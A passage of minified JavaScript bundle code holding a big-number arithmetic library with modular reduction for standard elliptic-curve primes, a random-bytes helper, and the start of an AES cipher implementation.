Bd=(R+(J=J+Math.imul(Oe,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Oe,Va)|0)+Math.imul(Te,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Te,Va)|0)+(Z>>>13)|0)+(Bd>>>26)|0,Bd&=67108863,J=Math.imul(pt,Ut),Z=(Z=Math.imul(pt,Yt))+Math.imul(vt,Ut)|0,ue=Math.imul(vt,Yt);var cl=(R+(J=J+Math.imul($e,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul($e,Va)|0)+Math.imul(st,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(st,Va)|0)+(Z>>>13)|0)+(cl>>>26)|0,cl&=67108863;var Bn=(R+(J=Math.imul(pt,Ha))|0)+((8191&(Z=(Z=Math.imul(pt,Va))+Math.imul(vt,Ha)|0))<<13)|0;return R=((ue=Math.imul(vt,Va))+(Z>>>13)|0)+(Bn>>>26)|0,Bn&=67108863,h[0]=co,h[1]=io,h[2]=yo,h[3]=Vn,h[4]=Eo,h[5]=Pn,h[6]=lo,h[7]=ao,h[8]=bo,h[9]=$n,h[10]=Do,h[11]=Mo,h[12]=no,h[13]=Kn,h[14]=Sa,h[15]=ra,h[16]=Bd,h[17]=cl,h[18]=Bn,0!==R&&(h[19]=R,G.length++),G};function O(A,v,P){P.negative=v.negative^A.negative,P.length=A.length+v.length;for(var G=0,X=0,L=0;L<P.length-1;L++){var h=X;X=0;for(var R=67108863&G,J=Math.min(L,v.length-1),Z=Math.max(0,L-A.length+1);Z<=J;Z++){var Ue=(0|A.words[L-Z])*(0|v.words[Z]),Xe=67108863&Ue;R=67108863&(Xe=Xe+R|0),X+=(h=(h=h+(Ue/67108864|0)|0)+(Xe>>>26)|0)>>>26,h&=67108863}P.words[L]=R,G=h,h=X}return 0!==G?P.words[L]=G:P.length--,P._strip()}function U(A,v,P){return O(A,v,P)}function K(A,v){this.x=A,this.y=v}Math.imul||(S=x),I.prototype.mulTo=function(v,P){var X=this.length+v.length;return 10===this.length&&10===v.length?S(this,v,P):X<63?x(this,v,P):X<1024?O(this,v,P):U(this,v,P)},K.prototype.makeRBT=function(v){for(var P=new Array(v),G=I.prototype._countBits(v)-1,X=0;X<v;X++)P[X]=this.revBin(X,G,v);return P},K.prototype.revBin=function(v,P,G){if(0===v||v===G-1)return v;for(var X=0,L=0;L<P;L++)X|=(1&v)<<P-L-1,v>>=1;return X},K.prototype.permute=function(v,P,G,X,L,h){for(var R=0;R<h;R++)X[R]=P[v[R]],L[R]=G[v[R]]},K.prototype.transform=function(v,P,G,X,L,h){this.permute(h,v,P,G,X,L);for(var R=1;R<L;R<<=1)for(var J=R<<1,Z=Math.cos(2*Math.PI/J),ue=Math.sin(2*Math.PI/J),Ie=0;Ie<L;Ie+=J)for(var Ae=Z,Ue=ue,Xe=0;Xe<R;Xe++){var He=G[Ie+Xe],Be=X[Ie+Xe],qe=G[Ie+Xe+R],De=X[Ie+Xe+R],Ve=Ae*qe-Ue*De;De=Ae*De+Ue*qe,G[Ie+Xe]=He+(qe=Ve),X[Ie+Xe]=Be+De,G[Ie+Xe+R]=He-qe,X[Ie+Xe+R]=Be-De,Xe!==J&&(Ve=Z*Ae-ue*Ue,Ue=Z*Ue+ue*Ae,Ae=Ve)}},K.prototype.guessLen13b=function(v,P){var G=1|Math.max(P,v),X=1&G,L=0;for(G=G/2|0;G;G>>>=1)L++;return 1<<L+1+X},K.prototype.conjugate=function(v,P,G){if(!(G<=1))for(var X=0;X<G/2;X++){var L=v[X];v[X]=v[G-X-1],v[G-X-1]=L,L=P[X],P[X]=-P[G-X-1],P[G-X-1]=-L}},K.prototype.normalize13b=function(v,P){for(var G=0,X=0;X<P/2;X++){var L=8192*Math.round(v[2*X+1]/P)+Math.round(v[2*X]/P)+G;v[X]=67108863&L,G=L<67108864?0:L/67108864|0}return v},K.prototype.convert13b=function(v,P,G,X){for(var L=0,h=0;h<P;h++)G[2*h]=8191&(L+=0|v[h]),G[2*h+1]=8191&(L>>>=13),L>>>=13;for(h=2*P;h<X;++h)G[h]=0;$(0===L),$(0==(-8192&L))},K.prototype.stub=function(v){for(var P=new Array(v),G=0;G<v;G++)P[G]=0;return P},K.prototype.mulp=function(v,P,G){var X=2*this.guessLen13b(v.length,P.length),L=this.makeRBT(X),h=this.stub(X),R=new Array(X),J=new Array(X),Z=new Array(X),ue=new Array(X),Ie=new Array(X),Ae=new Array(X),Ue=G.words;Ue.length=X,this.convert13b(v.words,v.length,R,X),this.convert13b(P.words,P.length,ue,X),this.transform(R,h,J,Z,X,L),this.transform(ue,h,Ie,Ae,X,L);for(var Xe=0;Xe<X;Xe++){var He=J[Xe]*Ie[Xe]-Z[Xe]*Ae[Xe];Z[Xe]=J[Xe]*Ae[Xe]+Z[Xe]*Ie[Xe],J[Xe]=He}return this.conjugate(J,Z,X),this.transform(J,Z,Ue,h,X,L),this.conjugate(Ue,h,X),this.normalize13b(Ue,X),G.negative=v.negative^P.negative,G.length=v.length+P.length,G._strip()},I.prototype.mul=function(v){var P=new I(null);return P.words=new Array(this.length+v.length),this.mulTo(v,P)},I.prototype.mulf=function(v){var P=new I(null);return P.words=new Array(this.length+v.length),U(this,v,P)},I.prototype.imul=function(v){return this.clone().mulTo(v,this)},I.prototype.imuln=function(v){var P=v<0;P&&(v=-v),$("number"==typeof v),$(v<67108864);for(var G=0,X=0;X<this.length;X++){var L=(0|this.words[X])*v,h=(67108863&L)+(67108863&G);G>>=26,G+=L/67108864|0,G+=h>>>26,this.words[X]=67108863&h}return 0!==G&&(this.words[X]=G,this.length++),P?this.ineg():this},I.prototype.muln=function(v){return this.clone().imuln(v)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(v){var P=function w(A){for(var v=new Array(A.bitLength()),P=0;P<v.length;P++)v[P]=A.words[P/26|0]>>>P%26&1;return v}(v);if(0===P.length)return new I(1);for(var G=this,X=0;X<P.length&&0===P[X];X++,G=G.sqr());if(++X<P.length)for(var L=G.sqr();X<P.length;X++,L=L.sqr())0!==P[X]&&(G=G.mul(L));return G},I.prototype.iushln=function(v){$("number"==typeof v&&v>=0);var L,P=v%26,G=(v-P)/26,X=67108863>>>26-P<<26-P;if(0!==P){var h=0;for(L=0;L<this.length;L++){var R=this.words[L]&X;this.words[L]=(0|this.words[L])-R<<P|h,h=R>>>26-P}h&&(this.words[L]=h,this.length++)}if(0!==G){for(L=this.length-1;L>=0;L--)this.words[L+G]=this.words[L];for(L=0;L<G;L++)this.words[L]=0;this.length+=G}return this._strip()},I.prototype.ishln=function(v){return $(0===this.negative),this.iushln(v)},I.prototype.iushrn=function(v,P,G){var X;$("number"==typeof v&&v>=0),X=P?(P-P%26)/26:0;var L=v%26,h=Math.min((v-L)/26,this.length),R=67108863^67108863>>>L<<L,J=G;if(X-=h,X=Math.max(0,X),J){for(var Z=0;Z<h;Z++)J.words[Z]=this.words[Z];J.length=h}if(0!==h)if(this.length>h)for(this.length-=h,Z=0;Z<this.length;Z++)this.words[Z]=this.words[Z+h];else this.words[0]=0,this.length=1;var ue=0;for(Z=this.length-1;Z>=0&&(0!==ue||Z>=X);Z--){var Ie=0|this.words[Z];this.words[Z]=ue<<26-L|Ie>>>L,ue=Ie&R}return J&&0!==ue&&(J.words[J.length++]=ue),0===this.length&&(this.words[0]=0,this.length=1),this._strip()},I.prototype.ishrn=function(v,P,G){return $(0===this.negative),this.iushrn(v,P,G)},I.prototype.shln=function(v){return this.clone().ishln(v)},I.prototype.ushln=function(v){return this.clone().iushln(v)},I.prototype.shrn=function(v){return this.clone().ishrn(v)},I.prototype.ushrn=function(v){return this.clone().iushrn(v)},I.prototype.testn=function(v){$("number"==typeof v&&v>=0);var P=v%26,G=(v-P)/26;return!(this.length<=G||!(this.words[G]&1<<P))},I.prototype.imaskn=function(v){$("number"==typeof v&&v>=0);var P=v%26,G=(v-P)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=G?this:(0!==P&&G++,this.length=Math.min(G,this.length),0!==P&&(this.words[this.length-1]&=67108863^67108863>>>P<<P),this._strip())},I.prototype.maskn=function(v){return this.clone().imaskn(v)},I.prototype.iaddn=function(v){return $("number"==typeof v),$(v<67108864),v<0?this.isubn(-v):0!==this.negative?1===this.length&&(0|this.words[0])<=v?(this.words[0]=v-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(v),this.negative=1,this):this._iaddn(v)},I.prototype._iaddn=function(v){this.words[0]+=v;for(var P=0;P<this.length&&this.words[P]>=67108864;P++)this.words[P]-=67108864,P===this.length-1?this.words[P+1]=1:this.words[P+1]++;return this.length=Math.max(this.length,P+1),this},I.prototype.isubn=function(v){if($("number"==typeof v),$(v<67108864),v<0)return this.iaddn(-v);if(0!==this.negative)return this.negative=0,this.iaddn(v),this.negative=1,this;if(this.words[0]-=v,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var P=0;P<this.length&&this.words[P]<0;P++)this.words[P]+=67108864,this.words[P+1]-=1;return this._strip()},I.prototype.addn=function(v){return this.clone().iaddn(v)},I.prototype.subn=function(v){return this.clone().isubn(v)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(v,P,G){var L;this._expand(v.length+G);var h,R=0;for(L=0;L<v.length;L++){h=(0|this.words[L+G])+R;var J=(0|v.words[L])*P;R=((h-=67108863&J)>>26)-(J/67108864|0),this.words[L+G]=67108863&h}for(;L<this.length-G;L++)R=(h=(0|this.words[L+G])+R)>>26,this.words[L+G]=67108863&h;if(0===R)return this._strip();for($(-1===R),R=0,L=0;L<this.length;L++)R=(h=-(0|this.words[L])+R)>>26,this.words[L]=67108863&h;return this.negative=1,this._strip()},I.prototype._wordDiv=function(v,P){var G,X=this.clone(),L=v,h=0|L.words[L.length-1];0!=(G=26-this._countBits(h))&&(L=L.ushln(G),X.iushln(G),h=0|L.words[L.length-1]);var Z,J=X.length-L.length;if("mod"!==P){(Z=new I(null)).length=J+1,Z.words=new Array(Z.length);for(var ue=0;ue<Z.length;ue++)Z.words[ue]=0}var Ie=X.clone()._ishlnsubmul(L,1,J);0===Ie.negative&&(X=Ie,Z&&(Z.words[J]=1));for(var Ae=J-1;Ae>=0;Ae--){var Ue=67108864*(0|X.words[L.length+Ae])+(0|X.words[L.length+Ae-1]);for(Ue=Math.min(Ue/h|0,67108863),X._ishlnsubmul(L,Ue,Ae);0!==X.negative;)Ue--,X.negative=0,X._ishlnsubmul(L,1,Ae),X.isZero()||(X.negative^=1);Z&&(Z.words[Ae]=Ue)}return Z&&Z._strip(),X._strip(),"div"!==P&&0!==G&&X.iushrn(G),{div:Z||null,mod:X}},I.prototype.divmod=function(v,P,G){return $(!v.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===v.negative?(h=this.neg().divmod(v,P),"mod"!==P&&(X=h.div.neg()),"div"!==P&&(L=h.mod.neg(),G&&0!==L.negative&&L.iadd(v)),{div:X,mod:L}):0===this.negative&&0!==v.negative?(h=this.divmod(v.neg(),P),"mod"!==P&&(X=h.div.neg()),{div:X,mod:h.mod}):0!=(this.negative&v.negative)?(h=this.neg().divmod(v.neg(),P),"div"!==P&&(L=h.mod.neg(),G&&0!==L.negative&&L.isub(v)),{div:h.div,mod:L}):v.length>this.length||this.cmp(v)<0?{div:new I(0),mod:this}:1===v.length?"div"===P?{div:this.divn(v.words[0]),mod:null}:"mod"===P?{div:null,mod:new I(this.modrn(v.words[0]))}:{div:this.divn(v.words[0]),mod:new I(this.modrn(v.words[0]))}:this._wordDiv(v,P);var X,L,h},I.prototype.div=function(v){return this.divmod(v,"div",!1).div},I.prototype.mod=function(v){return this.divmod(v,"mod",!1).mod},I.prototype.umod=function(v){return this.divmod(v,"mod",!0).mod},I.prototype.divRound=function(v){var P=this.divmod(v);if(P.mod.isZero())return P.div;var G=0!==P.div.negative?P.mod.isub(v):P.mod,X=v.ushrn(1),L=v.andln(1),h=G.cmp(X);return h<0||1===L&&0===h?P.div:0!==P.div.negative?P.div.isubn(1):P.div.iaddn(1)},I.prototype.modrn=function(v){var P=v<0;P&&(v=-v),$(v<=67108863);for(var G=(1<<26)%v,X=0,L=this.length-1;L>=0;L--)X=(G*X+(0|this.words[L]))%v;return P?-X:X},I.prototype.modn=function(v){return this.modrn(v)},I.prototype.idivn=function(v){var P=v<0;P&&(v=-v),$(v<=67108863);for(var G=0,X=this.length-1;X>=0;X--){var L=(0|this.words[X])+67108864*G;this.words[X]=L/v|0,G=L%v}return this._strip(),P?this.ineg():this},I.prototype.divn=function(v){return this.clone().idivn(v)},I.prototype.egcd=function(v){$(0===v.negative),$(!v.isZero());var P=this,G=v.clone();P=0!==P.negative?P.umod(v):P.clone();for(var X=new I(1),L=new I(0),h=new I(0),R=new I(1),J=0;P.isEven()&&G.isEven();)P.iushrn(1),G.iushrn(1),++J;for(var Z=G.clone(),ue=P.clone();!P.isZero();){for(var Ie=0,Ae=1;0==(P.words[0]&Ae)&&Ie<26;++Ie,Ae<<=1);if(Ie>0)for(P.iushrn(Ie);Ie-- >0;)(X.isOdd()||L.isOdd())&&(X.iadd(Z),L.isub(ue)),X.iushrn(1),L.iushrn(1);for(var Ue=0,Xe=1;0==(G.words[0]&Xe)&&Ue<26;++Ue,Xe<<=1);if(Ue>0)for(G.iushrn(Ue);Ue-- >0;)(h.isOdd()||R.isOdd())&&(h.iadd(Z),R.isub(ue)),h.iushrn(1),R.iushrn(1);P.cmp(G)>=0?(P.isub(G),X.isub(h),L.isub(R)):(G.isub(P),h.isub(X),R.isub(L))}return{a:h,b:R,gcd:G.iushln(J)}},I.prototype._invmp=function(v){$(0===v.negative),$(!v.isZero());var Ie,P=this,G=v.clone();P=0!==P.negative?P.umod(v):P.clone();for(var X=new I(1),L=new I(0),h=G.clone();P.cmpn(1)>0&&G.cmpn(1)>0;){for(var R=0,J=1;0==(P.words[0]&J)&&R<26;++R,J<<=1);if(R>0)for(P.iushrn(R);R-- >0;)X.isOdd()&&X.iadd(h),X.iushrn(1);for(var Z=0,ue=1;0==(G.words[0]&ue)&&Z<26;++Z,ue<<=1);if(Z>0)for(G.iushrn(Z);Z-- >0;)L.isOdd()&&L.iadd(h),L.iushrn(1);P.cmp(G)>=0?(P.isub(G),X.isub(L)):(G.isub(P),L.isub(X))}return(Ie=0===P.cmpn(1)?X:L).cmpn(0)<0&&Ie.iadd(v),Ie},I.prototype.gcd=function(v){if(this.isZero())return v.abs();if(v.isZero())return this.abs();var P=this.clone(),G=v.clone();P.negative=0,G.negative=0;for(var X=0;P.isEven()&&G.isEven();X++)P.iushrn(1),G.iushrn(1);for(;;){for(;P.isEven();)P.iushrn(1);for(;G.isEven();)G.iushrn(1);var L=P.cmp(G);if(L<0){var h=P;P=G,G=h}else if(0===L||0===G.cmpn(1))break;P.isub(G)}return G.iushln(X)},I.prototype.invm=function(v){return this.egcd(v).a.umod(v)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(v){return this.words[0]&v},I.prototype.bincn=function(v){$("number"==typeof v);var P=v%26,G=(v-P)/26,X=1<<P;if(this.length<=G)return this._expand(G+1),this.words[G]|=X,this;for(var L=X,h=G;0!==L&&h<this.length;h++){var R=0|this.words[h];L=(R+=L)>>>26,this.words[h]=R&=67108863}return 0!==L&&(this.words[h]=L,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(v){var G,P=v<0;if(0!==this.negative&&!P)return-1;if(0===this.negative&&P)return 1;if(this._strip(),this.length>1)G=1;else{P&&(v=-v),$(v<=67108863,"Number is too big");var X=0|this.words[0];G=X===v?0:X<v?-1:1}return 0!==this.negative?0|-G:G},I.prototype.cmp=function(v){if(0!==this.negative&&0===v.negative)return-1;if(0===this.negative&&0!==v.negative)return 1;var P=this.ucmp(v);return 0!==this.negative?0|-P:P},I.prototype.ucmp=function(v){if(this.length>v.length)return 1;if(this.length<v.length)return-1;for(var P=0,G=this.length-1;G>=0;G--){var X=0|this.words[G],L=0|v.words[G];if(X!==L){X<L?P=-1:X>L&&(P=1);break}}return P},I.prototype.gtn=function(v){return 1===this.cmpn(v)},I.prototype.gt=function(v){return 1===this.cmp(v)},I.prototype.gten=function(v){return this.cmpn(v)>=0},I.prototype.gte=function(v){return this.cmp(v)>=0},I.prototype.ltn=function(v){return-1===this.cmpn(v)},I.prototype.lt=function(v){return-1===this.cmp(v)},I.prototype.lten=function(v){return this.cmpn(v)<=0},I.prototype.lte=function(v){return this.cmp(v)<=0},I.prototype.eqn=function(v){return 0===this.cmpn(v)},I.prototype.eq=function(v){return 0===this.cmp(v)},I.red=function(v){return new l(v)},I.prototype.toRed=function(v){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),v.convertTo(this)._forceRed(v)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(v){return this.red=v,this},I.prototype.forceRed=function(v){return $(!this.red,"Already a number in reduction context"),this._forceRed(v)},I.prototype.redAdd=function(v){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,v)},I.prototype.redIAdd=function(v){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,v)},I.prototype.redSub=function(v){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,v)},I.prototype.redISub=function(v){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,v)},I.prototype.redShl=function(v){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,v)},I.prototype.redMul=function(v){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,v),this.red.mul(this,v)},I.prototype.redIMul=function(v){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,v),this.red.imul(this,v)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(v){return $(this.red&&!v.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,v)};var ee={k256:null,p224:null,p192:null,p25519:null};function se(A,v){this.name=A,this.p=new I(v,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function ve(){se.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function le(){se.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function ye(){se.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function z(){se.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function l(A){if("string"==typeof A){var v=I._prime(A);this.m=v.p,this.prime=v}else $(A.gtn(1),"modulus must be greater than 1"),this.m=A,this.prime=null}function f(A){l.call(this,A),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}se.prototype._tmp=function(){var v=new I(null);return v.words=new Array(Math.ceil(this.n/13)),v},se.prototype.ireduce=function(v){var G,P=v;do{this.split(P,this.tmp),G=(P=(P=this.imulK(P)).iadd(this.tmp)).bitLength()}while(G>this.n);var X=G<this.n?-1:P.ucmp(this.p);return 0===X?(P.words[0]=0,P.length=1):X>0?P.isub(this.p):void 0!==P.strip?P.strip():P._strip(),P},se.prototype.split=function(v,P){v.iushrn(this.n,0,P)},se.prototype.imulK=function(v){return v.imul(this.k)},ae(ve,se),ve.prototype.split=function(v,P){for(var G=4194303,X=Math.min(v.length,9),L=0;L<X;L++)P.words[L]=v.words[L];if(P.length=X,v.length<=9)return v.words[0]=0,void(v.length=1);var h=v.words[9];for(P.words[P.length++]=h&G,L=10;L<v.length;L++){var R=0|v.words[L];v.words[L-10]=(R&G)<<4|h>>>22,h=R}v.words[L-10]=h>>>=22,v.length-=0===h&&v.length>10?10:9},ve.prototype.imulK=function(v){v.words[v.length]=0,v.words[v.length+1]=0,v.length+=2;for(var P=0,G=0;G<v.length;G++){var X=0|v.words[G];v.words[G]=67108863&(P+=977*X),P=64*X+(P/67108864|0)}return 0===v.words[v.length-1]&&(v.length--,0===v.words[v.length-1]&&v.length--),v},ae(le,se),ae(ye,se),ae(z,se),z.prototype.imulK=function(v){for(var P=0,G=0;G<v.length;G++){var X=19*(0|v.words[G])+P,L=67108863&X;X>>>=26,v.words[G]=L,P=X}return 0!==P&&(v.words[v.length++]=P),v},I._prime=function(v){if(ee[v])return ee[v];var P;if("k256"===v)P=new ve;else if("p224"===v)P=new le;else if("p192"===v)P=new ye;else{if("p25519"!==v)throw new Error("Unknown prime "+v);P=new z}return ee[v]=P,P},l.prototype._verify1=function(v){$(0===v.negative,"red works only with positives"),$(v.red,"red works only with red numbers")},l.prototype._verify2=function(v,P){$(0==(v.negative|P.negative),"red works only with positives"),$(v.red&&v.red===P.red,"red works only with red numbers")},l.prototype.imod=function(v){return this.prime?this.prime.ireduce(v)._forceRed(this):(b(v,v.umod(this.m)._forceRed(this)),v)},l.prototype.neg=function(v){return v.isZero()?v.clone():this.m.sub(v)._forceRed(this)},l.prototype.add=function(v,P){this._verify2(v,P);var G=v.add(P);return G.cmp(this.m)>=0&&G.isub(this.m),G._forceRed(this)},l.prototype.iadd=function(v,P){this._verify2(v,P);var G=v.iadd(P);return G.cmp(this.m)>=0&&G.isub(this.m),G},l.prototype.sub=function(v,P){this._verify2(v,P);var G=v.sub(P);return G.cmpn(0)<0&&G.iadd(this.m),G._forceRed(this)},l.prototype.isub=function(v,P){this._verify2(v,P);var G=v.isub(P);return G.cmpn(0)<0&&G.iadd(this.m),G},l.prototype.shl=function(v,P){return this._verify1(v),this.imod(v.ushln(P))},l.prototype.imul=function(v,P){return this._verify2(v,P),this.imod(v.imul(P))},l.prototype.mul=function(v,P){return this._verify2(v,P),this.imod(v.mul(P))},l.prototype.isqr=function(v){return this.imul(v,v.clone())},l.prototype.sqr=function(v){return this.mul(v,v)},l.prototype.sqrt=function(v){if(v.isZero())return v.clone();var P=this.m.andln(3);if($(P%2==1),3===P){var G=this.m.add(new I(1)).iushrn(2);return this.pow(v,G)}for(var X=this.m.subn(1),L=0;!X.isZero()&&0===X.andln(1);)L++,X.iushrn(1);$(!X.isZero());var h=new I(1).toRed(this),R=h.redNeg(),J=this.m.subn(1).iushrn(1),Z=this.m.bitLength();for(Z=new I(2*Z*Z).toRed(this);0!==this.pow(Z,J).cmp(R);)Z.redIAdd(R);for(var ue=this.pow(Z,X),Ie=this.pow(v,X.addn(1).iushrn(1)),Ae=this.pow(v,X),Ue=L;0!==Ae.cmp(h);){for(var Xe=Ae,He=0;0!==Xe.cmp(h);He++)Xe=Xe.redSqr();$(He<Ue);var Be=this.pow(ue,new I(1).iushln(Ue-He-1));Ie=Ie.redMul(Be),ue=Be.redSqr(),Ae=Ae.redMul(ue),Ue=He}return Ie},l.prototype.invm=function(v){var P=v._invmp(this.m);return 0!==P.negative?(P.negative=0,this.imod(P).redNeg()):this.imod(P)},l.prototype.pow=function(v,P){if(P.isZero())return new I(1).toRed(this);if(0===P.cmpn(1))return v.clone();var X=new Array(16);X[0]=new I(1).toRed(this),X[1]=v;for(var L=2;L<X.length;L++)X[L]=this.mul(X[L-1],v);var h=X[0],R=0,J=0,Z=P.bitLength()%26;for(0===Z&&(Z=26),L=P.length-1;L>=0;L--){for(var ue=P.words[L],Ie=Z-1;Ie>=0;Ie--){var Ae=ue>>Ie&1;h!==X[0]&&(h=this.sqr(h)),0!==Ae||0!==R?(R<<=1,R|=Ae,(4==++J||0===L&&0===Ie)&&(h=this.mul(h,X[R]),J=0,R=0)):J=0}Z=26}return h},l.prototype.convertTo=function(v){var P=v.umod(this.m);return P===v?P.clone():P},l.prototype.convertFrom=function(v){var P=v.clone();return P.red=null,P},I.mont=function(v){return new f(v)},ae(f,l),f.prototype.convertTo=function(v){return this.imod(v.ushln(this.shift))},f.prototype.convertFrom=function(v){var P=this.imod(v.mul(this.rinv));return P.red=null,P},f.prototype.imul=function(v,P){if(v.isZero()||P.isZero())return v.words[0]=0,v.length=1,v;var G=v.imul(P),X=G.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),L=G.isub(X).iushrn(this.shift),h=L;return L.cmp(this.m)>=0?h=L.isub(this.m):L.cmpn(0)<0&&(h=L.iadd(this.m)),h._forceRed(this)},f.prototype.mul=function(v,P){if(v.isZero()||P.isZero())return new I(0)._forceRed(this);var G=v.mul(P),X=G.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),L=G.isub(X).iushrn(this.shift),h=L;return L.cmp(this.m)>=0?h=L.isub(this.m):L.cmpn(0)<0&&(h=L.iadd(this.m)),h._forceRed(this)},f.prototype.invm=function(v){return this.imod(v._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},9598:(Pe,we,de)=>{var ie;function j(ae){this.rand=ae}if(Pe.exports=function(I){return ie||(ie=new j(null)),ie.generate(I)},Pe.exports.Rand=j,j.prototype.generate=function(I){return this._rand(I)},j.prototype._rand=function(I){if(this.rand.getBytes)return this.rand.getBytes(I);for(var Q=new Uint8Array(I),F=0;F<Q.length;F++)Q[F]=this.rand.getByte();return Q},"object"==typeof self)self.crypto&&self.crypto.getRandomValues?j.prototype._rand=function(I){var Q=new Uint8Array(I);return self.crypto.getRandomValues(Q),Q}:self.msCrypto&&self.msCrypto.getRandomValues?j.prototype._rand=function(I){var Q=new Uint8Array(I);return self.msCrypto.getRandomValues(Q),Q}:"object"==typeof window&&(j.prototype._rand=function(){throw new Error("Not implemented yet")});else try{var $=de(9214);if("function"!=typeof $.randomBytes)throw new Error("Not supported");j.prototype._rand=function(I){return $.randomBytes(I)}}catch(ae){}},5461:(Pe,we,de)=>{var ie=de(265).Buffer;function j(E){ie.isBuffer(E)||(E=ie.from(E));for(var g=E.length/4|0,b=new Array(g),_=0;_<g;_++)b[_]=E.readUInt32BE(4*_);return b}function $(E){for(;0<E.length;E++)E[0]=0}function ae(E,g,b,_,y){for(var K,ee,se,ve,M=b[0],p=b[1],D=b[2],w=b[3],x=E[0]^g[0],S=E[1]^g[1],O=E[2]^g[2],U=E[3]^g[3],le=4,ye=1;ye<y;ye++)K=M[x>>>24]^p[S>>>16&255]^D[O>>>8&255]^w[255&U]^g[le++],ee=M[S>>>24]^p[O>>>16&255]^D[U>>>8&255]^w[255&x]^g[le++],se=M[O>>>24]^p[U>>>16&255]^D[x>>>8&255]^w[255&S]^g[le++],ve=M[U>>>24]^p[x>>>16&255]^D[S>>>8&255]^w[255&O]^g[le++],x=K,S=ee,O=se,U=ve;return K=(_[x>>>24]<<24|_[S>>>16&255]<<16|_[O>>>8&255]<<8|_[255&U])^g[le++],ee=(_[S>>>24]<<24|_[O>>>16&255]<<16|_[U>>>8&255]<<8|_[255&x])^g[le++],se=(_[O>>>24]<<24|_[U>>>16&255]<<16|_[x>>>8&255]<<8|_[255&S])^g[le++],ve=(_[U>>>24]<<24|_[x>>>16&255]<<16|_[S>>>8&255]<<8|_[255&O])^g[le++],[K>>>=0,ee>>>=0,se>>>=0,ve>>>=0]}var I=[0,1,2,4,8,16,32,64,128,27,54],Q=function(){for(var E=new Array(256),g=0;g<256;g++)E[g]=g<128?g<<1:g<<1^283;for(var b=[],_=[],y=[[],[],[],[]],M=[[],[],[],[]],p=0,D=0,w=0;w<256;++w){var x=D^D<<1^D<<2^D<<3^D<<4;b[p]=x=x>>>8^255&x^99,_[x]=p;var S=E[p],O=E[S],U=E[O],K=257*E[x]^16843008*x;y[0][p]=K<<24|K>>>8,y[1][p]=K<<16|K>>>16,y[2][p]=K<<8|K>>>24,y[3][p]=K,M[0][x]=(K=16843009*U^65537*O^257*S^16843008*p)<<24|K>>>8,M[1][x]=K<<16|K>>>16,M[2][x]=K<<8|K>>>24,M[3][x]=K,0===p?p=D=1:(p=S^E[E[E[U^S]]],D^=E[E[D]])}return{SBOX:b,INV_SBOX:_,SUB_MIX:y,INV_SUB_MIX:M}}();function F(E){this._key=j(E),this._reset()}F.blockSize=16,F.keySize=32,F.prototype.blockSize=F.blockSize,F.prototype.keySize=F.keySize,F.prototype._reset=function(){for(var E=this._key,g=E.length,b=g+6,_=4*(b+1),y=[],M=0;M<g;M++)y[M]=E[M];for(M=g;M<_;M++){var p=y[M-1];M%g==0?(p=Q.SBOX[(p=p<<8|p>>>24)>>>24]<<24|Q.SBOX[p>>>16&255]<<16|Q.SBOX[p>>>8&255]<<8|Q.SBOX[255&p],p^=I[M/g|0]<<24):g>6&&M%g==4&&(p=Q.SBOX[p>>>24]<<24|Q.SBOX[p>>>16&255]<<16|Q.SBOX[p>>>8&255]<<8|Q.SBOX[255&p]),y[M]=y[M-g]^p}for(var D=[],w=0;w<_;w++){var 